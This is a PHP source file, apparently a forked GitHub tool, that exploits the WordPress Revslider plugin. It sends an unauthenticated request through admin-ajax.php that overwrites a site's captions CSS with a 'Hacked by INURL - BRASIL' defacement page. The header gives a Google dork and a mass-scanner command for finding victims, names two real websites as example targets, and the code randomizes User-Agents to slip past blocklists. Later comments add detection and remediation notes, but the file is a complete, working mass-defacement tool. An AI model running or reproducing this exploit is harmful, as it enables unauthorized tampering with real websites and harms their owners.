forked from googleinurl/WORDPRESS-Revslider-Exploit-0DAY
<?php
/*
# AUTOR: googleINURL
# Blog: http://blog.inurl.com.br
# Twitter: https://twitter.com/googleinurl
# Fanpage: https://fb.com/InurlBrasil
# Pastebin http://pastebin.com/u/Googleinurl
# GIT: https://github.com/googleinurl
# PSS: http://packetstormsecurity.com/user/googleinurl/
# YOUTUBE http://youtube.com/c/INURLBrasil
# G+ http://google.com/+INURLBrasil
# Exploit Title: WORDPRESS Revslider Exploit (0DAY)
# Google DORK: inurl:admin-ajax.php?action=revslider_show_image -intext:"revslider_show_image"
# EXECUTE:
-t : SET TARGET.
-f : SET FILE TARGETS.
-p : SET PROXY
Execute:
php exploit.php -t target
php exploit.php -f targets
php exploit.php -t target -p 'http://localhost:9090'
# USE MASS EXPLOIT SCANNER INURLBR
./inurlbr.php --dork 'inurl:admin-ajax.php?action=revslider_show_image -intext:"revslider_show_image"' -s vull.txt -q 1,6 --command-all 'php inurl_revslider.php -t _TARGET_'
# SCAN: https://github.com/googleinurl/SCANNER-INURLBR
# PRINT: http://i.imgur.com/Fown6vf.png
# Exemples target:
http://victorylakeland.org/wp-admin/admin-ajax.php?action=revslider_ajax_action&client_action=get_captions_css
http://ndcom.ru/wp-admin/admin-ajax.php?action=revslider_ajax_action&client_action=get_captions_css
*/
// Command-line entry point: configures the runtime, parses the arguments,
// builds the $params array shared by every request, and dispatches to
// __request() (single target) or __listTarget() (target file).

// Report only E_ERROR (value 1), lift the execution time limit and flush
// output as it is produced, so a long run prints progress continuously.
error_reporting(1);
set_time_limit(0);
ini_set('display_errors', 1);
ini_set('max_execution_time', 0);
ini_set('allow_url_fopen', 1);
ob_implicit_flush(true);
ob_end_flush();
// Short options -f and -t each take a value; --help is the only long option.
$op_ = getopt('f:t:', array('help::'));
echo "[+] [Exploit]: WORDPRESS Revslider Exploit (0DAY) / INURL - BRASIL\nhelp: --help\n\n";
$menu = "
-t : SET TARGET.
-f : SET FILE TARGETS.
-p : SET PROXY
Execute:
php exploit.php -t target
php exploit.php -f targets
php exploit.php -t target -p 'http://localhost:9090'
\n";
// With --help, print the usage text and stop.
echo isset($op_['help']) ? exit($menu) : NULL;
$params = array(
// Value of -t, prefixed with "http://" when it does not contain "http".
'target' => not_isnull_empty($op_['t']) ? (strstr($op_['t'], 'http') ? $op_['t'] : "http://{$op_['t']}") : NULL,
// Value of -f, used only when -t is empty.
'file' => !not_isnull_empty($op_['t']) && not_isnull_empty($op_['f']) ? $op_['f'] : NULL,
'proxy' => not_isnull_empty($op_['p']) ? $op_['p'] : NULL,
// HTML that __request() sends as the "data" field. The marker text
// "Hacked by INURL - BRASIL" and the "blog.inurl.com.br" reference are
// content indicators: when triaging a suspected hit, look for them in the
// site's get_captions_css output and in whatever the plugin stored.
'deface' => "<body style='color: transparent;background-color: black'><center><h1><b style='color: white'>[ Hacked by INURL - BRASIL ]<br><marque>blog.inurl.com.br<p style='color: transparent'>",
// Separator printed between per-target results.
'line' => "--------------------------------------------------------------"
);
// Refuse to run when both a target and a target file are set.
// NOTE(review): 'file' is only populated when -t is empty, so this branch
// looks unreachable; confirm.
not_isnull_empty($params['target']) && not_isnull_empty($params['file']) ? exit("[X] [ERRO] DEFINE TARGET OR FILE TARGET\n") : NULL;
// Single-target mode: one request, then exit.
not_isnull_empty($params['target']) ? __request($params) . exit() : NULL;
// File mode: one request per line of the target file, then exit.
not_isnull_empty($params['file']) ? __listTarget($params) . exit() : NULL;
/**
 * Tells whether a value is usable as an option: neither null nor "empty"
 * in the sense of PHP's empty() ('', '0', 0, array(), false, ...).
 *
 * @param mixed $valor Value to inspect; defaults to NULL.
 * @return bool TRUE when the value is set and non-empty, FALSE otherwise.
 */
function not_isnull_empty($valor = NULL) {
    // Guard clause for the null case; everything else is decided by empty().
    if (is_null($valor)) {
        return FALSE;
    }
    if (empty($valor)) {
        return FALSE;
    }
    return TRUE;
}
/**
 * Pushes pending output to the terminal so progress lines appear immediately:
 * first PHP's output buffer (ob_flush), then the system write buffer (flush).
 */
function __plus() {
ob_flush();
flush();
}
/**
 * Calls __request() once for every distinct non-empty line of the target file.
 *
 * The targets are processed sequentially and each site receives one POST per
 * run, so detection on the receiving side has to key on the request content
 * (see __request) rather than on request volume.
 *
 * @param array $file Shared parameter array; 'file' is the path that is read
 *                    and 'target' is overwritten with each line in turn.
 */
function __listTarget($file) {
// Split on "\n", drop empty entries, then de-duplicate.
$tgt_ = array_unique(array_filter(explode("\n", file_get_contents($file['file']))));
echo "\n\t[!] [INFO] TOTAL SITES LOADED : " . count($tgt_) . "\n\n";
foreach ($tgt_ as $url) {
echo "\n[+] [INFO] SCANNING : {$url} \n";
__plus();
// Reuse the same parameter array, changing only the target.
$file['target'] = $url;
__request($file) . __plus();
}
}
/**
 * Builds a pseudo-random User-Agent string of the form
 * "<browser>/<1-20>.<0-20> (<os> <1-7>.<0-9>; <locale>;)".
 *
 * Browser, OS and locale are drawn independently from the three lists below,
 * so the combinations are often implausible (for example "Internet Explorer"
 * paired with "AmigaOS"), and the string always begins with one of the browser
 * tokens rather than the "Mozilla/5.0 (...)" prefix real browsers send.
 * Detection note: a blocklist of fixed User-Agent values will not match these
 * requests; the unusual layout is at best a weak supporting signal next to
 * the POST fields built in __request().
 *
 * @return string The generated User-Agent value.
 */
function __setUserAgentRandom() {
// Browser name tokens (some entries are repeated in the list).
$agentBrowser = array('Firefox', 'Safari', 'Opera', 'Flock', 'Internet Explorer', 'Seamonkey', 'Tor Browser', 'GNU IceCat', 'CriOS', 'TenFourFox',
'SeaMonkey', 'B-l-i-t-z-B-O-T', 'Konqueror', 'Mobile', 'Konqueror', 'Netscape', 'Chrome', 'Dragon', 'SeaMonkey', 'Maxthon', 'IBrowse'
);
// Operating system / platform tokens.
$agentSistema = array('Windows 3.1', 'Windows 95', 'Windows 98', 'Windows 2000', 'Windows NT', 'Linux 2.4.22-10mdk', 'FreeBSD',
'Windows XP', 'Windows Vista', 'Redhat Linux', 'Ubuntu', 'Fedora', 'AmigaOS', 'BackTrack Linux', 'iPad', 'BlackBerry', 'Unix',
'CentOS Linux', 'Debian Linux', 'Macintosh', 'Android', 'iPhone', 'Windows NT 6.1', 'BeOS', 'OS 10.5', 'Nokia', 'Arch Linux',
'Ark Linux', 'BitLinux', 'Conectiva (Mandriva)', 'CRUX Linux', 'Damn Small Linux', 'DeLi Linux', 'Ubuntu', 'BigLinux', 'Edubuntu'
);
// Locale tokens; both "xx-YY" and "xx_YY" spellings occur.
$locais = array('cs-CZ', 'en-US', 'sk-SK', 'pt-BR', 'sq_AL', 'sq', 'ar_DZ', 'ar_BH', 'ar_EG', 'ar_IQ', 'ar_JO',
'ar_KW', 'ar_LB', 'ar_LY', 'ar_MA', 'ar_OM', 'ar_QA', 'ar_SA', 'ar_SD', 'ar_SY', 'ar_TN', 'ar_AE', 'ar_YE', 'ar',
'be_BY', 'be', 'bg_BG', 'bg', 'ca_ES', 'ca', 'zh_CN', 'zh_HK', 'zh_SG', 'zh_TW', 'zh', 'hr_HR', 'hr', 'cs_CZ', 'cs',
'da_DK', 'da', 'nl_BE', 'nl_NL', 'nl', 'en_AU', 'en_CA', 'en_IN', 'en_IE', 'en_MT', 'en_NZ', 'en_PH', 'en_SG', 'en_ZA',
'en_GB', 'en_US', 'en', 'et_EE', 'et', 'fi_FI', 'fi', 'fr_BE', 'fr_CA', 'fr_FR', 'fr_LU', 'fr_CH', 'fr', 'de_AT', 'de_DE'
);
// One random pick per list plus random version numbers, joined in a fixed layout.
return $agentBrowser[rand(0, count($agentBrowser) - 1)] . '/' . rand(1, 20) . '.' . rand(0, 20) . ' (' . $agentSistema[rand(0, count($agentSistema) - 1)] . ' ' . rand(1, 7) . '.' . rand(0, 9) . '; ' . $locais[rand(0, count($locais) - 1)] . ';)';
}
/**
 * Sends one POST to the target's admin-ajax.php asking the Revslider
 * "update_captions_css" client action to store $__['deface'], then reports
 * whether the response body contained "true".
 *
 * Request as built below (for log searches and WAF rules):
 *   - POST {target}/wp-admin/admin-ajax.php
 *   - fields: action=revslider_ajax_action,
 *     client_action=update_captions_css, data=<HTML>
 *   - the fields are passed as an array, which PHP's cURL binding encodes as
 *     multipart/form-data, so a rule that inspects only the query string or a
 *     URL-encoded body will not see them
 *   - no login, nonce or other credential is added; the only cookies are
 *     whatever cookie.log already holds
 *
 * A site that accepts this request is presumably running a plugin build whose
 * AJAX handler does not require an authenticated, authorised user. The
 * remediation is to update the plugin, including any copy bundled inside a
 * theme, and until then to reject unauthenticated requests carrying these
 * action/client_action values at the web server or WAF.
 *
 * Local artefacts: cookie.log (cookie jar) and revslider.txt (appended list of
 * URLs the tool counted as successful) are written to the current working
 * directory; finding them on a host indicates the script was run there.
 *
 * @param array $__ Shared parameter array; reads 'target', 'proxy', 'deface'
 *                  and 'line'.
 */
function __request($__) {
$curlxpl = curl_init();
curl_setopt($curlxpl, CURLOPT_URL, "{$__['target']}/wp-admin/admin-ajax.php");
// Route through the proxy only when one was supplied.
(!is_null($__['proxy']) ? curl_setopt($curlxpl, CURLOPT_PROXY, $__['proxy']) : NULL);
// A new generated User-Agent for every request.
curl_setopt($curlxpl, CURLOPT_USERAGENT, __setUserAgentRandom());
curl_setopt($curlxpl, CURLOPT_POST, 1);
curl_setopt($curlxpl, CURLOPT_POSTFIELDS, array("action" => "revslider_ajax_action","client_action" => "update_captions_css", "data" => $__['deface']));
// Return the body instead of printing it, and follow redirects.
curl_setopt($curlxpl, CURLOPT_RETURNTRANSFER, 1);
curl_setopt($curlxpl, CURLOPT_FOLLOWLOCATION, 1);
// Certificate and host-name verification are both switched off.
curl_setopt($curlxpl, CURLOPT_SSL_VERIFYPEER, false);
curl_setopt($curlxpl, CURLOPT_SSL_VERIFYHOST, 0);
// The same file is read for stored cookies and written with received ones.
curl_setopt($curlxpl, CURLOPT_COOKIEFILE, 'cookie.log');
curl_setopt($curlxpl, CURLOPT_COOKIEJAR, 'cookie.log');
$result = curl_exec($curlxpl) . __plus();
// Success is a case-insensitive match for "true" anywhere in the response
// body, so any page containing that word is logged as a hit; entries in
// revslider.txt need independent verification before a site is treated as
// modified.
if (eregi('true', $result)) {
// URL of the read-side action, where the stored content can be inspected.
$h = "{$__['target']}/wp-admin/admin-ajax.php?action=revslider_ajax_action&client_action=get_captions_css";
echo "[!] [INFO] Success Exploit!\n";
echo "[!] [INFO] URL FILE MODIFIED: {$h}\n{$__['line']}\n";
__plus();
file_put_contents("revslider.txt", "{$h}\n\n", FILE_APPEND);
} else {
echo "[!] [FAIL] {$__['target']} : nothing changed \n{$__['line']}\n";
}
curl_close($curlxpl);
unset($curlxpl);
}